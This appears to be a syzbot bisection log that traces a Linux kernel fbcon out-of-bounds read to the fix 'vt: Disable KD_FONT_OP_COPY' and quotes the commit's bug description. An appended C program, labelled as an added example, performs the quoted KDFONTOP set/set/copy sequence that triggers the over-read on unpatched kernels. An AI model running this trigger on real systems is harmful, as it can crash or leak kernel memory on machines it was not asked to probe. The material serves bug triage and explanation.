bisecting fixing commit since fb683b5e3f53a73e761952735736180939a313df
building syzkaller on 1508f45368a309a3b1196a342b3d64ce7be4cc43
testing commit fb683b5e3f53a73e761952735736180939a313df with gcc (GCC) 8.1.0
kernel signature: c23962a421ac897760b39febbc24693449746e9d844e1d5ed84ad3eda75780d5
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
testing current HEAD 0c88e405c97ed1828443b67891e6d4bb6e56cd4e
testing commit 0c88e405c97ed1828443b67891e6d4bb6e56cd4e with gcc (GCC) 8.1.0
kernel signature: 7e2c4520a1ee2640296e7cdbdf402436f4ee0a3ac45c7fd2dc2bd24f6e3a7420
all runs: OK
# git bisect start 0c88e405c97ed1828443b67891e6d4bb6e56cd4e fb683b5e3f53a73e761952735736180939a313df
Bisecting: 3462 revisions left to test after this (roughly 12 steps)
[4355296b8d6235d1b3b2bcdd20b4242ce399a878] arm64: Add part number for Neoverse N1
testing commit 4355296b8d6235d1b3b2bcdd20b4242ce399a878 with gcc (GCC) 8.1.0
kernel signature: c7b49ff509dadea0d952b9ef22ac4aaf1a3a83a01fabcce42dc53cc03569aa17
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good 4355296b8d6235d1b3b2bcdd20b4242ce399a878
Bisecting: 1731 revisions left to test after this (roughly 11 steps)
[daa69a213f038f4dafb4feda19db9d135b5ce308] mwifiex: Prevent memory corruption handling keys
testing commit daa69a213f038f4dafb4feda19db9d135b5ce308 with gcc (GCC) 8.1.0
kernel signature: 2db902d3bd618b2bcb0ef42042c6e21e2ebc9812c60cf8de9f4cb4c8769c8b4f
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good daa69a213f038f4dafb4feda19db9d135b5ce308
Bisecting: 865 revisions left to test after this (roughly 10 steps)
[41f5e62866f0ceb31a825dc91f0440727dbb9495] batman-adv: mcast: fix duplicate mcast packets from BLA backbone to mesh
testing commit 41f5e62866f0ceb31a825dc91f0440727dbb9495 with gcc (GCC) 8.1.0
kernel signature: e3b81590040e1e9ecb5f1dc7364e0650b87dd297d6aa01df1ac5ba27cbef2611
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good 41f5e62866f0ceb31a825dc91f0440727dbb9495
Bisecting: 432 revisions left to test after this (roughly 9 steps)
[dea09436da034930fbd63420b3c6a010b98e8fab] xen/events: add a new "late EOI" evtchn framework
testing commit dea09436da034930fbd63420b3c6a010b98e8fab with gcc (GCC) 8.1.0
kernel signature: edf6f668f91ab8254c991463300038dc8e1ef87a34b69a4795ba2fbfea8cfbed
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good dea09436da034930fbd63420b3c6a010b98e8fab
Bisecting: 216 revisions left to test after this (roughly 8 steps)
[83a282f990ba94103eb49be1ad69a8e4b2de4fbd] usb: mtu3: fix panic in mtu3_gadget_stop()
testing commit 83a282f990ba94103eb49be1ad69a8e4b2de4fbd with gcc (GCC) 8.1.0
kernel signature: 24160a498344dab1302d3ca78ebeae9416cc3dde3b18f2762a346bde88520745
all runs: OK
# git bisect bad 83a282f990ba94103eb49be1ad69a8e4b2de4fbd
Bisecting: 107 revisions left to test after this (roughly 7 steps)
[9bbfd6578e596d3bf480e74d142e49c88102014d] udf: Fix memory leak when mounting
testing commit 9bbfd6578e596d3bf480e74d142e49c88102014d with gcc (GCC) 8.1.0
kernel signature: 301ae4bcf5dd1dde5e5b7a8aadde2c558e7a9d2381cf6f320993af28b01bfc14
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good 9bbfd6578e596d3bf480e74d142e49c88102014d
Bisecting: 53 revisions left to test after this (roughly 6 steps)
[64752f5cfda61aa7ca12d23ca1ecc7d36e996f93] sctp: Fix COMM_LOST/CANT_STR_ASSOC err reporting on big-endian platforms
testing commit 64752f5cfda61aa7ca12d23ca1ecc7d36e996f93 with gcc (GCC) 8.1.0
kernel signature: a40eb65f89363b716045c99fcc1dac8ace44cc71a75a32a8f15d1675dc921dfd
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good 64752f5cfda61aa7ca12d23ca1ecc7d36e996f93
Bisecting: 26 revisions left to test after this (roughly 5 steps)
[1471e96263b6e68929e7afed28f80ab3b6bd1066] lib/crc32test: remove extra local_irq_disable/enable
testing commit 1471e96263b6e68929e7afed28f80ab3b6bd1066 with gcc (GCC) 8.1.0
kernel signature: 5364172e87b558a33373eef361944554f48dda69623da19bdf79847727f6f53a
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good 1471e96263b6e68929e7afed28f80ab3b6bd1066
Bisecting: 13 revisions left to test after this (roughly 4 steps)
[239aed5d2ecbfd381ca642f0a6bcb272c98408df] blk-cgroup: Pre-allocate tree node on blkg_conf_prep
testing commit 239aed5d2ecbfd381ca642f0a6bcb272c98408df with gcc (GCC) 8.1.0
kernel signature: ffe2b33fa2699a987b501caff728cc891211f2673860473b947056c98c69a777
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good 239aed5d2ecbfd381ca642f0a6bcb272c98408df
Bisecting: 6 revisions left to test after this (roughly 3 steps)
[18f5757d7fd3ae455c2fcfd60efd5242ea9836f6] serial: 8250_mtk: Fix uart_get_baud_rate warning
testing commit 18f5757d7fd3ae455c2fcfd60efd5242ea9836f6 with gcc (GCC) 8.1.0
kernel signature: 066e22f0633a3912d0c092d182d81580de6737c956242e98e7ad80b4c233a7a7
all runs: OK
# git bisect bad 18f5757d7fd3ae455c2fcfd60efd5242ea9836f6
Bisecting: 3 revisions left to test after this (roughly 2 steps)
[6eecfcbcde431904e5837d285e9e99b5a5eac02c] drm/vc4: drv: Add error handding for bind
testing commit 6eecfcbcde431904e5837d285e9e99b5a5eac02c with gcc (GCC) 8.1.0
kernel signature: 77b804fe467a96537ea3a3f82180edaf94ce452553c93f88397d5cf33c70765b
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good 6eecfcbcde431904e5837d285e9e99b5a5eac02c
Bisecting: 1 revision left to test after this (roughly 1 step)
[6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb] vt: Disable KD_FONT_OP_COPY
testing commit 6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb with gcc (GCC) 8.1.0
kernel signature: 011d54d9c8dc4aaaa0551bb7acdd90b2585a0853ffa211e695489e73c7432039
all runs: OK
# git bisect bad 6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb
Bisecting: 0 revisions left to test after this (roughly 0 steps)
[a52cdf61125b2189a8e1d85d1e61d654f7fe5d4d] ACPI: NFIT: Fix comparison to '-ENXIO'
testing commit a52cdf61125b2189a8e1d85d1e61d654f7fe5d4d with gcc (GCC) 8.1.0
kernel signature: 705453d979217ed234ecce871a370469b544bcdaecc948a8b9eb361d07688bc8
all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer
# git bisect good a52cdf61125b2189a8e1d85d1e61d654f7fe5d4d
6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb is the first bad commit
commit 6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb
Author: Daniel Vetter
Date:   Sun Nov 8 16:38:06 2020 +0100

    vt: Disable KD_FONT_OP_COPY

    commit 3c4e0dff2095c579b142d5a0693257f1c58b4804 upstream.

    It's buggy:

    On Fri, Nov 06, 2020 at 10:30:08PM +0800, Minh Yuan wrote:
    > We recently discovered a slab-out-of-bounds read in fbcon in the latest
    > kernel ( v5.10-rc2 for now ). The root cause of this vulnerability is that
    > "fbcon_do_set_font" did not handle "vc->vc_font.data" and
    > "vc->vc_font.height" correctly, and the patch
    > for VT_RESIZEX can't handle this
    > issue.
    >
    > Specifically, we use KD_FONT_OP_SET to set a small font.data for tty6, and
    > use KD_FONT_OP_SET again to set a large font.height for tty1. After that,
    > we use KD_FONT_OP_COPY to assign tty6's vc_font.data to tty1's vc_font.data
    > in "fbcon_do_set_font", while tty1 retains the original larger
    > height. Obviously, this will cause an out-of-bounds read, because we can
    > access a smaller vc_font.data with a larger vc_font.height.

    Further there was only one user ever.

    - Android's loadfont, busybox and console-tools only ever use OP_GET
      and OP_SET
    - fbset documentation only mentions the kernel cmdline font: option,
      not anything else.
    - systemd used OP_COPY before release 232 published in Nov 2016

    Now unfortunately the crucial report seems to have gone down with
    gmane, and the commit message doesn't say much. But the pull request
    hints at OP_COPY being broken

    https://github.com/systemd/systemd/pull/3651

    So in other words, this never worked, and the only project which
    foolishly ever tried to use it, realized that rather quickly too.

    Instead of trying to fix security issues here on dead code by adding
    missing checks, fix the entire thing by removing the functionality.

    Note that systemd code using the OP_COPY function ignored the return
    value, so it doesn't matter what we're doing here really - just in
    case a lone server somewhere happens to be extremely unlucky and
    running an affected old version of systemd. The relevant code from
    font_copy_to_all_vcs() in systemd was:

        /* copy font from active VT, where the font was uploaded to */
        cfo.op = KD_FONT_OP_COPY;
        cfo.height = vcs.v_active-1; /* tty1 == index 0 */
        (void) ioctl(vcfd, KDFONTOP, &cfo);

    Note this just disables the ioctl, garbage collecting the now unused
    callbacks is left for -next.

    v2: Tetsuo found the old mail, which allowed me to find it on another
    archive. Add the link too.

    Acked-by: Peilin Ye
    Reported-by: Minh Yuan
    References: https://lists.freedesktop.org/archives/systemd-devel/2016-June/036935.html
    References: https://github.com/systemd/systemd/pull/3651
    Cc: Greg KH
    Cc: Peilin Ye
    Cc: Tetsuo Handa
    Signed-off-by: Daniel Vetter
    Link: https://lore.kernel.org/r/20201108153806.3140315-1-daniel.vetter@ffwll.ch
    Signed-off-by: Greg Kroah-Hartman

 drivers/tty/vt/vt.c | 24 ++----------------------
 1 file changed, 2 insertions(+), 22 deletions(-)

culprit signature: 011d54d9c8dc4aaaa0551bb7acdd90b2585a0853ffa211e695489e73c7432039
parent signature: 705453d979217ed234ecce871a370469b544bcdaecc948a8b9eb361d07688bc8
revisions tested: 15, total time: 3h43m19.230959391s (build: 2h33m9.189875505s, test: 1h8m24.366941218s)
first good commit: 6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb vt: Disable KD_FONT_OP_COPY
recipients (to): ["daniel.vetter@ffwll.ch" "daniel.vetter@intel.com" "gregkh@linuxfoundation.org" "yepeilin.cs@gmail.com"]
recipients (cc): []
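Added example, not part of the syzbot log, the report or the kernel patch: a user-space C program that drives the KDFONTOP ioctl through the exact sequence quoted in the commit message (small font on tty6, tall font on tty1, then KD_FONT_OP_COPY with the height field carrying the source console index, as in the systemd snippet) and computes the geometry check that the old COPY path never made. The `struct console_font_op` fields and the KD_FONT_OP_* constants are the real ones from `<linux/kd.h>`; `glyph_bytes`, `vc_font_geom`, `copy_overread_bytes`, the 8x8 and 8x32 geometries and the /dev/tty paths are this example's own assumptions (the byte count models "height rows per glyph, rows padded to whole bytes"; the kernel's own allocation is not reproduced here). The ioctl part needs root and a VT; on a kernel with this fix the COPY request is rejected.

```c
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/kd.h>

#define CHARCOUNT 256

/* Geometry a console ends up with after its own KD_FONT_OP_SET (example type). */
struct vc_font_geom {
    unsigned int width;
    unsigned int height;
    unsigned int charcount;
};

/* Bytes of glyph data a console of this geometry is rendered from.
 * Assumption of this example: height rows per glyph, each row padded to
 * whole bytes. 8x8x256 -> 2048, 8x32x256 -> 8192. */
size_t glyph_bytes(const struct vc_font_geom *g)
{
    return (size_t)((g->width + 7) / 8) * g->height * g->charcount;
}

/* The check the pre-fix COPY path skipped: after the copy the destination
 * keeps its own width/height but renders from the source's data, so any
 * excess of the destination's needs over the source's data is an over-read. */
size_t copy_overread_bytes(const struct vc_font_geom *dst, const struct vc_font_geom *src)
{
    size_t need = glyph_bytes(dst), have = glyph_bytes(src);
    return need > have ? need - have : 0;
}

/* KD_FONT_OP_SET request. The SET buffer is always 32 rows per glyph,
 * whatever the height, so callers pass a 32 * charcount byte array for 8-wide fonts. */
struct console_font_op make_set_op(unsigned int width, unsigned int height,
                                   unsigned char *data)
{
    struct console_font_op op;
    memset(&op, 0, sizeof op);
    op.op = KD_FONT_OP_SET;
    op.width = width;
    op.height = height;
    op.charcount = CHARCOUNT;
    op.data = data;
    return op;
}

/* KD_FONT_OP_COPY request. The kernel reused the height field as the
 * zero-based source console index (tty1 == 0), which is why the systemd
 * snippet in the commit message sets cfo.height = v_active-1. */
struct console_font_op make_copy_op(unsigned int src_tty_number)
{
    struct console_font_op op;
    memset(&op, 0, sizeof op);
    op.op = KD_FONT_OP_COPY;
    op.height = src_tty_number - 1;
    return op;
}

int main(void)
{
    static unsigned char small_font[32 * CHARCOUNT];   /* 8x8 glyphs, zeroed */
    static unsigned char tall_font[32 * CHARCOUNT];    /* 8x32 glyphs, zeroed */
    struct vc_font_geom tty6_geom = { 8, 8, CHARCOUNT };
    struct vc_font_geom tty1_geom = { 8, 32, CHARCOUNT };
    struct console_font_op op;
    int tty6 = open("/dev/tty6", O_RDWR);
    int tty1 = open("/dev/tty1", O_RDWR);

    if (tty6 < 0 || tty1 < 0) {
        perror("open /dev/tty1 or /dev/tty6 (needs root and a VT)");
        return 1;
    }

    /* Step 1 from the report: small font.data on tty6. */
    op = make_set_op(8, 8, small_font);
    if (ioctl(tty6, KDFONTOP, &op) < 0)
        perror("KD_FONT_OP_SET tty6");

    /* Step 2: large font.height on tty1. */
    op = make_set_op(8, 32, tall_font);
    if (ioctl(tty1, KDFONTOP, &op) < 0)
        perror("KD_FONT_OP_SET tty1");

    /* Step 3: the missing check, then COPY tty6 -> tty1 into tty1's larger height. */
    printf("COPY would leave tty1 reading %zu bytes past tty6's data\n",
           copy_overread_bytes(&tty1_geom, &tty6_geom));
    op = make_copy_op(6);
    if (ioctl(tty1, KDFONTOP, &op) < 0)
        printf("KD_FONT_OP_COPY rejected: %s (kernel carries the fix)\n", strerror(errno));
    else
        printf("KD_FONT_OP_COPY accepted: tty1 now has 8-row data under a 32-row height\n");

    close(tty6);
    close(tty1);
    return 0;
}
```

The pure functions are the point of the example: `copy_overread_bytes` is the comparison a font-copy path would have to make before adopting another console's data, and it is exactly what the report says was absent. The patch on this page sidesteps the question by rejecting KD_FONT_OP_COPY outright, so on a fixed kernel the third ioctl fails and the message printed by the first branch is expected.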